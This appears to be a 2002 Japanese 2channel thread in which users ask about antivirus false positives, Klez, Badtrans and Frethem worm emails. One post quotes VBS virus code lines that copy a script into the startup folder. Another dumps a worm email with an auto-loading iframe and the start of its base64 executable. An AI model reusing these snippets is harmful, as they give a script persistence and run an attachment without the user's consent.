そんなことよりさ、ちょいと聞いてくれよ。スレにあんま関係ないんだけどさ。 このあいだ、久々に2ch覗いたんです。2ch。 そしたらなんか半角板のスレ開いたらパソコンが変な動きするんです。 で、よく見たらなんかノーd先生が警告出して騒いでるんです。 で、ウイルススレ見てみたらどうやら原因は先生の誤反応なんです。 もうね、先生アホかと。馬鹿かと。 先生な、普段仕事してないのに厨房コピペに一々反応なんかすんな、ボケが。 厨房のコピペだよ、コピペ。 なんか親子連れとかも助けてレスしてるし。一家4人で誤反応か。おめでてーな。 よーしパパセキュリティー板で原因聞いちゃうぞー、とか言ってるの。もう見てらんない。 お前らな、マカフィーやるから安心しろと。 誤反応ってのはな、もっと殺伐としてるべきなんだよ。 ノーd先生がいつ誤反応しちまってもおかしくない、 反応するか反応しないかの、そんな雰囲気がいいんじゃねーか。女子供は、すっこんでろ。 で、やっと騒ぎが収まったかと思うと、ウイルス対策スレがいっぱい立ってるんです。 そこでまたぶち切れですよ。 あのな、対策スレなんてきょうび流行んねーんだよ。ボケが。 得意げな顔して何が、誤反応に注意!だ。 お前は本当に2chネラーかと問いたい。問い詰めたい。小1時間問い詰めたい。 お前、他人から仕入れたその場限りの知識で自慢したいだけとちゃうんかと。 先生通の俺から言わせてもらえば今、先生通の間での最新流行はやっぱり、 コールセンターに電話、これだね。 あのー誤反応がすごいんですけど。厨房対策に誤反応多めにしてくれ。これが通の頼み方。 しかしこれを頼むと次から死満テックにマークされるという危険も伴う、諸刃の剣。 素人にはお薦め出来ない。 まあお前ら、ド素人は、マカフィーでもインストしてなさいってこった。
607 :
名無しさん@お腹いっぱい。 :02/07/07 20:15
とあるHPにアクセスしたところ、タイトルが「C」となっている 小ウィンドウが現れました。すぐに閉じたのですが、閉じるまで に時間がかかりました。 その後何の問題もなくネットを続け、パソコンの電源オフ。 先程パソコンを起動したところ、ハードディスクを作り直し ますか?」とのダイアログが出ました。 キャンセルし、その後再起動しても何も起らないのですが、 初めての経験で不安です。 ウィルスに感染しているのでしょうか? 知識のある方々、教えて下さい。
>>607 該当サイトのURLと、OSやブラウザのその時の設定等も書いた方が、他の人もレスしやすいかと。
不安なら、ウイルスのスキャンしたらどうっしょか。
最近よくklezが送られてくるんだが、もちろん送信元のアドレスは適当に拾ってきてある。 が、、だ。メールを発射したPCのドメイン情報とか時間は詐称してないような気がするのだが 実際のところどうなのか教えてくらはい。 あと、リターンパスには本当の送信者な気がしなくも・・・・・
>>608 ウィルスソフト入れてないんです・・・。
OSはマックOS8.6。ブラウザはIE5.0。設定とは何の設定でしょうか?
URLは履歴がないので分かりません。
>>609 その通りだと思いまする。
でも漏れのメアドに毎回送って来る人は、Nifty利用者だという事を除くと情報が無いので、気の毒です。
>>611 さん。
やっぱそうですよね。。
漏れにくるのはOCNからなんで、何県の何地方までわかりますぜ・・・といっても押しかけるわけじゃないから関係ないか(藁
>>613 Return-Pathのメアド宛てに、警告メル送ったらどうっしょ。
>>614 このスレの様子をしばらく静観して、それがあってるなら
そうしようと思いまふ。
617 :
名無しさん@お腹いっぱい。 :02/07/07 21:04
VBS.Love Letter.A 上記のがノートンで検出されたんですが・・・。 何をするウイルスでしょうか??
620 :
名無しさん@お腹いっぱい。 :02/07/07 21:10
どうも・・・。 誤作動なら安心です。 そういえば2ちゃんのどこか開いたらダウンしますかと出たかも・・・。 お手数かけました。
>>612 ありがとうございました。
ダウンロードしてきます。
携帯に最近よく入るウイルスメールなんですけど ヘッダから公開してもよろしいでしょうか?昨日受信関係のデータが 全部消沈しました。 差出人は毎回変わっていて知り合いの知り合いの名前だったりもするので あてにはならないとは思うのですが、本文が文字列なので 種類くらいは判別できるかなと思いまして… 文字列のコピペくらいはここでしても支障ないですよね?
623 :
名無しさん@お腹いっぱい。 :02/07/08 19:58
昨日から、もう一台のPCで作業中に青画面で、ドライブCに書き込めません というエラーがでるようになりました。スキャンディスクをかけても同じエラーで 途中で止まってしまいます。それで思い切ってクリーンインストールする事にしました。 ところがCドライブをフォーマット後、ウィンドウズMeをインストール中に BootSector Write ! VIRUS: Continue(Y/N)? という表示がでて止まってしまいます。この時Y、Nどちらを押しても 反応はありません。その後FDISKで領域削除、再確保からやってみよう と思いましたが、そこでも上の表示が出てFDISKを完了できません。 これってウィルスでしょうか?(VIRUSって書いてあるし・・) OSが消えてるのでオンラインウィルススキャンなどもできません。 途方にくれてここに書き込んでみました。 解決法ありますでしょうか?
たった今、差出人が「 2ch <
[email protected] >」でタイトルが「A special new game 」
っていう、怪しい添付ファイル(INSTALL.EXEとHTMLファイル)つきのメールが来ました。
2ちゃんねらーだと知ってて送ってきたのか、無差別なものなのか気になります。
このスレでいいのかどうかわかりませんが、どなたか同じメールを受け取った人はいませんか。
自分の情報消してヘッダー見せて下さい
>>624 こら、いきなり質問するなとちゃんと注意して誘導しただろうが。
このスレとかKlesスレの前の方を見ろと書いただろうが。
それとも初級ネットからでなく、自発的にマルチなのか?
>>625 以下がヘッダです。
Return-Path: <
[email protected] >
Received: from smtp.net-keeper.net (smtp.net-keeper.com [210.157.11.225]) by **********.dti.ne.jp (1.01) with ESMTP id g68AEku08477 for <**********.dti.ne.jp>; Mon, 8 Jul 2002 19:14:46 +0900 (JST)
Received: from Gdgvfhd (061196244058.cidr.odn.ne.jp [61.196.244.58])
by smtp.net-keeper.net (8.11.2/Oh-2001-01-01) with SMTP id g68ACoq29509
for <**********dti.ne.jp>; Mon, 8 Jul 2002 19:12:50 +0900 (JST)
Date: Mon, 8 Jul 2002 19:12:50 +0900 (JST)
Message-Id: <
[email protected] >
From: 2ch <
[email protected] >
To: **********.dti.ne.jp
Subject: A special new game
MIME-Version: 1.0
>>626 すいません、自分でスレの内容から判断してここに書きこみました。
何度も質問を書きこんでスレを消費するのもまずいかなと思って。
よってたかって叩かれないように注意してやったのに 聞く気がないなら勝手にしろ。
>>623 ブートセクタが壊れたのを、「おいおい、Villiじゃねぇの?」、ってパソが警告しとるだけなんじゃないでしょか。
ハカーイHDを、もう一台のパソのHDにスレーブ接続して作業してみてはどうっしょ。
物理的に「逝っちゃった」、って可能性もアリだけど。
>>630 レスありがとうございます。
その方法を試してみます。Dドライブだけでも助かればいいのですが・・
漏れの再レス、ちょっと遅かった、かな?
とりあえずハカーイHDの中身は取り出せました。 オンラインスキャンでは何も出てこなかったのですが、 上のページのマスターブートレコードの修復法を試したら、また BootSector Write ! VIRUS: Continue(Y/N)? これが出て駄目でした。今度はY,Nに反応するようでした。 結局起動ドライブとして使えない様なので新しいHDD買ってきます。 壊れたほうはとりあえず隔離しときました。データドライブとしても あやしいので・・ありがとうございましたー。
637 :
名無しさん@お腹いっぱい。 :02/07/09 12:56
>636 もう遅いかな? BIOS設定を変えてみて下さい
638 :
名無しさん@お腹いっぱい。 :02/07/09 16:21
Badtranceってダイヤルアップ接続をプチプチ勝手に切ったりしますか? どうも感染しているらしく、友達のPCにウイルスメールを送っているみたい なんですが、オンラインスキャンしようにも途中で勝手に接続切られて 駆除ツールのDLもできません。 友達の家に来たのはBadtranceだったらしいのですが、本当にうちから送られたのかは 確かめる前に消したらしく、もしかしたらほかのウイルスかも・・ ちなみにWIN98SEです。
639 :
名無しさん@お腹いっぱい。 :02/07/09 16:31
>>638 回線切って、アンチウィルスソフト買ったら?
接続してるとどんどん撒き散らしてるのはわかるよね。加害者なんだよ。
ちなみに、”Badtrans”だよ。
640 :
名無しさん@お腹いっぱい。 :02/07/09 16:40
>>639 すみません・・ぱにくってて接続してたら撒き散らすことを忘れていました・・
帰りにソフト買ってみます。(いまは学校からで、家のは切ってあります)
お返事ありがとうございました。
641 :
名無しさん@お腹いっぱい。 :02/07/09 17:02
今日MXで動画を交換でDLさせて貰った相手から 「すいません。さっきのファイルにウイルスが入ってました。 しかも、たちの悪いことにどっかのキチガイのお手製なんで アンチウィルスソフトにも引っ掛りません。 もし既に再生してたら連絡ください。」 ってIMが来てて、そのIMに気付いた時にはその人は、 既にオフラインになってて連絡の取り様がないんで困っています。 既に再生してしまってたんで、色々検索して調べてみたんですが、 Mpegのファイルでウィルスに感染する事は無いと書いたページが 有ったんで、ただのイタヅラかと思っているんですが、、、。 一応オンラインウイルススキャンをしてみても何も引っ掛りませんでした。
それは、ご愁傷様。
てか最低限の知識も無いヤシがMXとかしてるからこんなに ウンコみたいなウィルスとか広まるんだよなあ
っていうか、実際Mpegファイルを見ただけでウイルスに 感染する事なんてないよ。、、、、、ね?
646 :
名無しさん@お腹いっぱい。 :02/07/09 18:52
また来ました。怪しげなメールです。 件名が「customer」「mitsuto」「kazuya」「kanime」の4通のメールで、 メールサイズがいずれも130KB前後。 来た覚えがあるって人はレスください。
どうやら4通ともウィルスのようでした。 Hotmailをブラウザからみると、本文の部分のHTMLに書かれたコードも 全部抹消してしまうみたいなので、 ウィルスの種類までは特定できませんでした。 とりあえず、ありがとうございました。
648 :
名無しさん@お腹いっぱい。 :02/07/09 19:30
ちょっとマジ質問。 今日(七月九日)の午後四時くらいから、 2チャンネルのニュース速報+にアクセスした途端、 ノートンアンチウィルスがVBS.LOVELETTER.Aを検出しました。 検出場所はTemporary internet filesにおいてです。 他の板にアクセスした場合も検出することがあるみたいなんですが、 皆さんのは大丈夫でしょうか?
ああ、ノートン先生の誤反応らしいわけで既出っぽいですね。 失礼失礼。
あっけなく流されているけど、かなりネット慣れしているっぽい人がいる。。。。。
>>648 今さっきいきなりでてビックリした…
書き込みしようとしたらで意味不明だったけど誤反応だったのね。
安心した…
>>652 拡張子mpgに偽装してあるだけで、実際はmpegじゃねーじゃねーか。
大体ウィルスの定義わかって言ってるのか小一時間・・・
656 :
名無しさん@お腹いっぱい。 :02/07/10 16:29
緊急!!「NortonAntivirus」でウィルスが検出されました。修復できませんでした。」 とでました。この場合どういう処置をとればいいのでしょうか? どなたかおしえてください。困っています・・・。グスン。
ウィルス名も書かないでわかると思ってるのか小一時間・・・ 過去ログ読む気も無いのか小一時間・・・
>>656 検疫されてるだろ。レポートの検疫のところ見ろ。ついでに削除も
してしまう。
>>656 お前ニュー速+でコピペしまくってる奴じゃないか?
VBS.Network.Eっていうやつです。
>>659 違います
だから過去ログよめ 大体658に書いてあんだろ
2ch見てると VBS.LoveLetter.Aに感染したんだけど、なんなの???
過去ログ読め
激しく既出ですた。。すまんこ
2ちゃんでノートンが反応したのは、感染ではなく検出なんだから騒がなくてよろしい。 どうしてそこらへんが分からないのか…
農豚がデカデカと「感染」って出すからだろー 先生はちょっと頭がおかしい
「何か気になる点を教えてもらえますか?」 「夜中、犬の様子が変だったんです。」 「あの犬は夜中、何もしませんでしたよ?」 「だから、変なんです。」 と、シャーロックホームズは言った。
668 :
名無しさん@お腹いっぱい。 :02/07/10 17:30
暖房うざい
同じウイルスがよくメールで送りつけられるのですが。 ウイルス送る奴にアドレスが知られてるって事でしょうか
672 :
名無しさん@お腹いっぱい。 :02/07/10 18:58
>>671 本人が知ってるかはわからないが、感染者のPCの中にあなたのメア
ドが記録されてることは確か。それはアドレス帳の場合もあれば、HPに記
載したメアドや掲示板に書き込んだメアドがキャッシュとなって残ってい
る場合もある。
ただし最近のウィルスは送信者として現れている者が感染者とは限らない
ので、メールの「送信者」欄にある人があなたのメアドを知っているとは
限らない。
>672 ありがとうございます
668が踏んだため。
675 :
名無しさん@お腹いっぱい。 :02/07/10 23:15
たすけてください!!!!!!!!!!!!!! 先ほどnorton antivirrusがウイルスを感知しました。 VBS.Network.Eというウイルスらしいのですが、修復も検疫も削除もできません。 どうすればよいのでしょうか? だれか助けてください!!!!!!!!!!!!!!!!!!
お腹いっぱい。
677 :
名無しさん@お腹いっぱい。 :02/07/10 23:20
さきほど検疫したら直ったみたいです。 おさわがせしてもうしわけございませんでした。 何度もトライすればなおるもんなんですかね?
一人で勝手に騒いでるのはお騒がせしたとは言わない
つーか過去ログ見ろよ
お騒ぎしまして、申し訳ござらん。
さっきPC内検索したらskdll.dllって不明アプリがシステムから出てきた んだけど、これ元々システムフォルダに組み込まれているものですか? ウイルスだったら思い当たるふしは某UG系ソフト・・・
あぼーん
>>684 威力業務妨害だよ。令状あればログから書き込み者が割り出せるから
このあたりで止めた方がいいぞ。
sage
>>687 俺も元カキコは見てないが、削除依頼を見たところでは
ウィルスメールの送付を依頼する内容だったらしい。
>>690 うん、わかった。
天気もいいことだし、これからサイクリングにでも逝ってくるよ。
うらやますぃ〜
693 :
名無しさん@お腹いっぱい。 :02/07/11 17:31
NSAの謀略
NSの策略
Nの陰毛
ンボマ
699 :
名無しさん@お腹いっぱい。 :02/07/11 18:49
JS_NOCLOSE JOKE_MADO.A BKDR_BO2K このウイルスの削除の仕方教えてください。 サイトを見てもやり方が解らないんです
>>699 複数のに一度に感染かぁ。
何したのか知らんけど。
検出できないのを喰らってる可能性もあるから、OSクリーンインストールした方がいいんじゃないっしょか。
ちゅうか。 どのフォルダから検出されたのかとか、それはどゆファイルだったのかとか、OS何かとか書いて欲しかった。 MeやXPのシステム復元に使うrestoreフォルダとか、IEのキャッシュから、昔拾ってそのままにしていたzipファイル、とかね。 忙しいのに体調不良なんで、寝まする。
702 :
名無しさん@お腹いっぱい。 :02/07/11 20:51
すいません。 OSはMEで、RESTOREに感染してました・・・
湿気高いし暑いから生ものは注意せなあかんよ。
ろくきゅうご あんたも俺も、すでに盗聴対象です
706 :
名無しさん :02/07/12 01:29
なぜか急に「閉じる」「最小化」とかパソコンのあらゆる項目などがギリシャ文字みたいな やつに変わってしまったんですがこれはウイルスですか?あとワードなどで印刷したり したらパソコン上に表示されてるやつと印刷した文字が違うんです。どなたか親切な方 教えてください。ウイルスであればどうすれば直りますか?
>>706 プリンタのケーブルの確認と設定の見直し。
まずはそこから。
709 :
名無しさん :02/07/12 10:40
707さん708さんありがとうございました!!やってみます!
710 :
名無しさん@お腹いっぱい。 :02/07/12 23:21
W32.Kitro.C.Wormウィルスに感染したみたいです。 ネットで調べたら、Kitro.Aは載っていて、MSNメッセンジャー経路の ウィルスだと分りました。 でも、情報が少なく、またKitoro.Cについては、探しても 見つけることができません。 ちなみに、ノートンでは、削除などできない、と出てしまって、 どうやって駆除すればいいか、教えてください。 お願いします。
>>711 それです、それ!!
本当にありがとうございます。
助かりました。
これから、さっそく読んで、解決します。
m(._.)mペコッ
713 :
名無しさん@お腹いっぱい。 :02/07/12 23:46
携帯電話が感染ていうのはありますでしょうか? チェーンメールで送られてきて下のカーソルが効かなくなってしまいました。
714 :
名無しさん@お腹いっぱい。 :02/07/12 23:58
715 :
名無しさん :02/07/13 01:36
MXで動画をダウンロードして開いたら突然電源が切れました。すぐ再起動し て特に問題はなかったのですが、それ以来パソコンを起動してディスクトップ 画面がでると電源が切れ、再起動しスキャンディスクが終了してまた同じこ とを繰り返す・・・、こういった症状が頻繁に起こるようになったのです。 ウィルスでしょうか? この症状を御存知の方、情報をお待ちしています。宜しくお願い致します。
218.50.39.122 ここから攻撃されたよ。
>>713 ウイルスではなく、バグです。電源を切れば直ります。
画像読み込みをしなければ発生しません。
720 :
名無しさん@お腹いっぱい。 :02/07/13 11:52
だれか教えてください。 画像ファイルが勝手に「あぼーん」に置き換わるんですが。 ちなみに、OPERAもやられたか、デスクトップにも小さく「あぼーん」と・・・。
725 :
すみません :02/07/13 13:28
IE5のテンポラリーファイルで 「VBS.NETWORK.E」ウィルスが検知されました これって単純にデリートされるんですか? どうもクレ板のキャッシュみたいなんですけど
726 :
名無しさん@お腹いっぱい。 :02/07/13 13:42
727 :
すみません :02/07/13 13:47
ガイシュツだったんですね イタズラとのことですが、一応DELLしました ありがとうございました
4500Cは確かに買い得かもな・・・
KOPIGDKO.EXE という添付のメールが届きました。 送信者も賢明も書いてありませんでした。 ウイルスでしょうか? トレンドマイクロで検索しましたが出てきませんでした。 どなたかご存知だったら教えてください。 よろしくおながいします
開けてみれば分かる。
>>730 分からなければ捨てよ。アンチウィルスソフト常駐させよ。
KO*KOでピンと来ないもんかね
735 :
名無しさん@お腹いっぱい。 :02/07/13 20:46
最近フリーズが多いんですけど、ウイルスでしょうかね? そんな症状を生み出すウイルスっていますか?
最近なんでもかんでもウィルスのせいにする奴が多いんですけど、ウィルスでしょうかね? そんな症状を生み出すウィルスっていますか?
>>730 ∧_∧ / ̄ ̄ ̄ ̄ ̄ ̄ ̄
( ´∀`)< 今時HYBRISかよ
( ) \_______
| | |
(__)_)
>>736 >なんでもかんでもウィルスのせいにする奴
奴ではありません、それがウィルスです。
一過性のものと慢性のものがあります。
濡れ衣を着せられる前に逃げましょう。
今の地震はウィルスのせいですか?
最近、BadtransやKlezが毎週末(特に金曜日)4〜5通届きます。 このことで、メアド変更しようとも考えているのですが、 これって、誰か(クラッカー組織など)が狙ってると考えてもいいのですか?
そうだね貴方が組織に狙われるほど凄い人ならね。
>>741 俺はそんなに凄くないYo!
でも、こう毎週毎週来るって明らかにおかしいんだけど・・・。
横レス失礼します。。。
あの〜次期転職先からメールがきまして、返事だそうとしたんですが、先方はボッキー2とかっていうメーラー使ってるので、こっちが思いっきりアウトルックエキスプレスってなんだか・・・初心者っぽいじゃないですか?
そこで、ヘッダーをちょこちょこイジって、かっこよくしようと思うんです。。。
そこで諸先輩方のご助言なんですが、かっこよくメールする方法をお尋ねしたいんですが・・・Telnetとかあんまりメンドーなのは(^^;;;
なんか、ヘッダー部分のイジれるメーラーみたいなのとか、教えて頂きたいんですが。。。まじぽんレスです。
※ リメーラーとか使うと、選考落ちそうなので(笑)他で何かありまでんでしょうか?
※
http://www.big-z.net の Formrun Ver1.33(非会員用)のメーラーって何となく凄そうなのですが・・・如何でしょうか?
744 :
名無しさん@お腹いっぱい。 :02/07/13 22:14
失礼。
>>743 でした。
自分に返してどーすんだ・・・。
言ってること自体間違ってるだろ
>>743 ポスペつかう
これなら本採用まちがいなし
さいきん、2chのスレッドを閲覧すると、メール欄に記入のあるハンドル 名のあるところが(名無しさん@お腹いっぱいみたいな)、 青でなく紫色で表示される事が多くなったんだけど、 これってウィルスに感染したせいなんですか。 一応ノートンを入れてあるんだけど。
だから なんでもかんでもミソもクソもウィルスのせいにすんな 初心者がウィルスですか?ってのの98%は自分の操作の結果だからな IEのキャッシュ消してブラウザ再起動すれ
751 :
名無しさん@お腹いっぱい。 :02/07/14 13:06
最近、毎日のようにバッドトランスが添付されたメールが送りつけられます。その都度送信者は違うのですが、 どうもメッセージのタイトルとかが、ある事件をきっかけに疎遠になった友人と私だけが知っているような共通項が書かれていたりします。 もし恨みを買っているのなら、いくら考えてもコイツ以外には考えられません。 警察への被害届も考えていますが、どうやったら証拠がつかめるのでしょうか? 独りよがりの質問ですみませんが、教えていただけませんか? ちなみに私のPCは感染していませんでした。
752 :
名無しさん@お腹いっぱい。 :02/07/14 13:40
VBS.Network.E fso.copyfile "c:\network.vbs", "j:\windows\start menu\programs\startup\" VBSInternal cIf s = "htm" and fso.FileExists(f1.path+"l") = False thenfso.CopyFile f1.path, f1.path+"l" VBS Freelink.B Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)
754 :
名無しさん@お腹いっぱい。 :02/07/14 15:31
トロイの木馬の感染経路を教えてください。 添付メール?HP見れば? おねがいします。
756 :
名無しさん@お腹いっぱい。 :02/07/14 16:32
トロイの木馬?HP見れば?
>>752 反応ないよ(´・ω・`)ショボーン
ウィルスバスダが反応するのないの?????
定義アップやエンジン更新してんだけど1度も動かないよ------
日付: 2002/07/14 、 時刻: 17:41:18 圧縮されたファイル (l50[1]) は右ファイル内にある (C:\Documents and Settings\漏れの名前\Local Settings\Temporary Internet Files\Content.IE5\89ATCDEX\l50[1]) は VBS.LoveLetter.A ウィルスに感染しています。 ファイルを修復できません。 日付: 2002/07/14 、 時刻: 17:41:18 ファイル C:\Documents and Settings\漏れの名前\Local Settings\Temporary Internet Files\Content.IE5\UB4NU7WX\lame[1].htm は Trojan Horse ウィルスに感染しています。 ファイルを修復できません。 初めてノートン先生のお世話になったのですが、検出は出来たけど、その後駆除処理に移りません。 漏れは一体どうすれば良いのでしょうか?(´Д`;) あと、ウィルスバスター(トレンドマイクロから落とした体験版)では 検出すらしてくれなかったのですが、こんなもんなんでしょうか?
>>761 さん。
レスありがとうございます。
さっそく試してみましたが、ファイルを検索しても見つかりません。
89ATCDEXやUB4NU7WXなんてフォルダも無いです。
漏れはこのままTrojan Horseに怯えなければならないのでしょうか? (´Д`;)
>>762 エクスプローラで似たファイル名まで検索するか、IEのキャッシュを
削除
764 :
名無しさん@お腹いっぱい。 :02/07/15 09:18
>>760 ウィルスバスターの体験版は定義ファイルがリリースされたときのままで
更新できないから、最新のウィルス・ワームは検出されないことがある。あくまでも
自己の環境で作動するか、使い勝手などを確認するための体験版のようだ。
>>764 というか、これに関してはノートンの誤検出だし、ひっかかる必要のないものだと思うが。
ちなみに、バスターは最新定義のものでも反応しない。
通常のウイルスのチェックに関してはその通りですが。
767 :
名無しさん@お腹いっぱい。 :02/07/15 14:20
Subject: Re: Your password! 添付ファイル decrypt-password.exe で、メールサイズが約69KBのこんなメールが いっぱい届きだした。新種ウィルスか? --L1db82sd319dm2ns0f4383dhG Content-Type: text/html; Content-Transfer-Encoding: quoted-printable <HTML><HEAD></HEAD><BODY> <FONT COLOR=#FF0000> <b>ATTENTION!</b><br><br> You can access<br> <b>very important</b><br> information by<br> this password<br><br> <b>DO NOT SAVE</b><br> password to disk<br> use your mind<br><br> now press<br> <b>cancel</b><br><br> (XXXXX XXXXX)</font></BODY></HTML> <iframe src=3Dcid:W8dqwq8q918213 height=3D0 width=3D0></iframe> --L1db82sd319dm2ns0f4383dhG Content-Type: audio/x-midi; name=decrypt-password.exe Content-Transfer-Encoding: base64 Content-ID: <W8dqwq8q918213> TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAA8AAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4g 以下略
768 :
名無しさん@お腹いっぱい。 :02/07/15 14:22
>>767 のウィルスメールだが、今のところ NTT グループの企業から
やたらたくさん届いている。
769 :
名無しさん@お腹いっぱい。 :02/07/15 14:37
770 :
名無しさん@お腹いっぱい。 :02/07/15 14:42
>>769 アンチウィルス各社対応済みだね。
NTTグループはアンチウィルスソフトいれてないばかりか、古いOE使ってるのか?
最低だな。
>>770 うちは入れてましたが
インテリの方が12日対応済み
ライブの方が17日対応予定で、
タイムラグにやられた感がありますな
772 :
名無しさん@お腹いっぱい。 :02/07/15 15:00
アンチウイルスソフト(ウイルスバスター)の最新版でもすり抜けたYO! WORM_FRETHEM.JとWORM_FRETHEM.Eでは違うのかな???
773 :
名無しさん@お腹いっぱい。 :02/07/15 15:27
私もウイルスバスター最新版を入れてあるのですが、すり抜けてきました。
774 :
名無しさん@お腹いっぱい。 :02/07/15 16:03
FRETHEM の新しい亜種のようです。 それで、ウィルス対策ソフトでは、まだ検出できない。
775 :
名無しさん@お腹いっぱい。 :02/07/15 16:27
英語版のWinだけがターゲットですか?
776 :
名無しさん@お腹いっぱい。 :02/07/15 16:27
>>774 じゃあ、ダイレクトアクションありだからIE/OE使用者はプレビュー
切っておいたほうがいいね。IE6.0/5.5SP2/5.01SP1以外のバージョンの
ひとは必ずバージョンアップすること。
777 :
名無しさん@お腹いっぱい。 :02/07/15 16:28
>>767 Norton は検出できなかったようです。
778 :
名無しさん@お腹いっぱい。 :02/07/15 16:31
>>775 関係ないと思う。でなきゃ、こんなに日本で広まらない。
779 :
Bocky! :02/07/15 16:33
780 :
名無しさん@お腹いっぱい。 :02/07/15 16:37
InterScanとNAVの最新版でもすり抜けたよ。 新しい亜種っぽいね こっちは広島大学から来た
あぼーん
783 :
名無しさん@お腹いっぱい。 :02/07/15 16:47
>>780 NAVの最新って7/12のウイルス対策済み数61664のほう?
7/12付けはIntelligent Updaterで2回定義が更新されたよね。
WORM_BADTRANS.Bに感染してからメールが受け取れなくなってしまいました。 既に駆除ツールを使いウィルスは消えたと思うのですが、自分から自分へウィルス付のメールを 送ってこようとしているみたいです。それを削除しようにもメールを受け取ろうとしてもしばらくすると 「応答がありません」とか言われます。で、こんなエラーメッセージが出るのですがどうすればいいでしょう? サーバーと通信しようとして、タイムアウトが発生しました。 アカウント : 'po-mc.neweb.ne.jp', サーバー : 'po-mc.neweb.ne.jp', プロトコル : POP3, ポート : 110, セキュリティ (SSL): なし, エラー番号 : 0x800CCC19
785 :
名無しさん@お腹いっぱい。 :02/07/15 16:53
>>783 NAVCEだから詳しくはわかんないんだけど
7/12Rev19となってる。
787 :
名無しさん@お腹いっぱい。 :02/07/15 17:06
>>786 Norton AntiVirus Corporate Edition
ウイルス定義ファイルバージョン: 40712s
シーケンス番号: 17848 かな?
788 :
名無しさん@お腹いっぱい。 :02/07/15 17:18
いろんなとこから新種ウイルスがなだれ込んでくるよ〜 うちの会社は完全にメールを止めた。トレンドマイクロは 現在パターンファイルを開発中。直接聞いた。
とりあえずトレンドマイクロからの情報を WORM_FETHEMの亜種は現在のパターンでは検出出来ませんが 30分後に配布するパターン317で対応します。 Interscanの話ですが
790 :
名無しさん@お腹いっぱい。 :02/07/15 17:21
791 :
名無しさん@お腹いっぱい。 :02/07/15 17:26
「Re:Your Password!」 JPNICのメーリングリストから届いたよ。 でもこれを購読している人って少なそうだから影響は無いかな?
792 :
名無しさん@お腹いっぱい。 :02/07/15 17:31
>>789 17:00頃にはできると聞いたが、現時点でまだ出来ていない模様。
30分に対応するって話ですが 遅れてるみたいです。
かぶった。スマソ
あぼーん
>>795 ドサクサにまぎれて不正アクセス禁止法違反ですか?
通報しますた
俺のサイト
間違い。他の掲示板で書かれていた。
800 :
名無しさん@お腹いっぱい。 :02/07/15 17:45
さっきも逢ったよ
んなこと言われても困ります。 すいませんでした。
804 :
名無しさん@お腹いっぱい。 :02/07/15 17:48
nikkeibpからも「Re: Your Password!」MLに来たよ。 HTMLメールはじく設定だったから助かったけど。
不正アクセス禁止法ってどんなんですか?
806 :
名無しさん@お腹いっぱい。 :02/07/15 17:51
俺は捕まるんですか?
809 :
名無しさん@お腹いっぱい。 :02/07/15 17:54
勿論してません
IP記録とかかいてあったから
812 :
名無しさん@お腹いっぱい。 :02/07/15 17:56
じゃぁ、何で捕まると思ったの?
813 :
名無しさん@お腹いっぱい。 :02/07/15 17:57
だいぜうぶ、ついでにメーラー変えとけ。
不正アクセス禁止法ですよ。あー、焦った。
そういやたかがゲームで不正アクセス禁止法違反して捕まった奴らには笑ったなぁ(w
そんなんがあったんですか。確かに笑えます。
奴らということは複数人…
たかが2chのカキコtで捕まる
>>816 の方が笑える。
819 :
名無しさん@お腹いっぱい。 :02/07/15 18:05
To: フィールドに大量のアドレスを並べて、 「ウィルスのお詫び」を送ってきやがった。 Bcc で送れよ。
え?やっぱり俺は捕まるんですか?
821 :
Bocky! :02/07/15 18:08
822 :
名無しさん@お腹いっぱい。 :02/07/15 18:09
823 :
名無しさん@お腹いっぱい。 :02/07/15 18:11
トレンドマイクロのアップデートまだかよぉ。 予定より1時間以上遅れてるぞ。メールサーバが動かせん。
え?ちょっと意味不なんですけど。捕まるのか捕まらないのか答えてもらいたいです。
826 :
名無しさん@お腹いっぱい。 :02/07/15 18:14
>>824 お前のたいーほよりも定義ファイルのほうが心配だ
827 :
名無しさん@お腹いっぱい。 :02/07/15 18:19
>>780 NAVCEの最新版だと対応してるっぽいぞ
LiveUpdataはまだだが
今時プレビューで感染してる奴は即死して欲しい。
829 :
名無しさん@お腹いっぱい。 :02/07/15 18:42
WORM_FRETHEM.K 対応のパターンがトレンドから出ますた パターンは317です
uso desita gomen nasai . . .
832 :
名無しさん@お腹いっぱい。 :02/07/15 18:54
パターン317age
なんかすり抜けてない???
>> imasara...
836 :
名無しさん@お腹いっぱい。 :02/07/15 19:06
>>833 漏れがトレンドに解析依頼した検体2個のうち片方は、パターン317でも
検出しなかった・・・。
だめぢゃん。
>>836 なんだかファイルサイズが異なるのがいきなり出てますね。
メル送信以外の機能が無いように祈りまする。
オレのところにきたやつは48640bytesだった。 トレンドのオンラインスキャン(パターン317)では検出してくれなかった
>>838 Symantecだと47,616 バイトだけど。
うちに届くのって、添付ファイル45KB台のが多い。
ファイルサイズが大きいってのは、どゆ機能が追加されているのかドキドキっすね。
W32.Frethem.J@mm これ、オラクルから来たヤシいる?
842 :
名無しさん@お腹いっぱい。 :02/07/16 01:09
Frethem.kきたけど、 オンラインスキャンしたら一度すり抜けた。 そんなはずないだろと思って テンポラリのディレクトリを直接スキャンしたら なんとか検出してくれた。 いい加減だな、オンラインスキャンって。
843 :
名無しさん@お腹いっぱい。 :02/07/16 01:25
さっきから窓の杜から、ウィルスきまくりなんですが・・ 偽装にしても多すぎ。
847 :
名無しさん@お腹いっぱい。 :02/07/16 13:08
添付ファイルがあるやつと無いやつがあるけど無いのも危険?
848 :
感染しちまいました :02/07/16 14:46
普段マックを使っているのですが、winを実家で初めて使っています。 オンラインチェックをしたらウイルスが発見されました。 メールソフトは設定もしていないし、送受信もしていない(webメールのみ)のに 感染してしまいました。変な添付メールは一度も来てません。こんな事ってあるのでしょうか? VBS.LoveLetter.A というやつです。過去ログにはファイルを削除、とありましたが どれを削除してよいのかわからないので、ウイルスバスターを買う事にしました。 これはwebメールでも感染してしまうのでしょうか??マックにも感染しますか? ウイルスをばらまいたと思うと心配で夜も眠れません
すんませんでした。でもウイルスバスターは買います。。
852 :
名無しさん@お腹いっぱい。 :02/07/17 02:05
スペイン語のメールがやたらと来るんだけどこれってなんなんすかね? 決まって大きさが313Kなんです。
853 :
名無しさん@お腹いっぱい。 :02/07/17 08:24
>>852 アンチウィルスソフトいれてないのか。
アンチウィルスが反応しなかったら、単なるスパム。
854 :
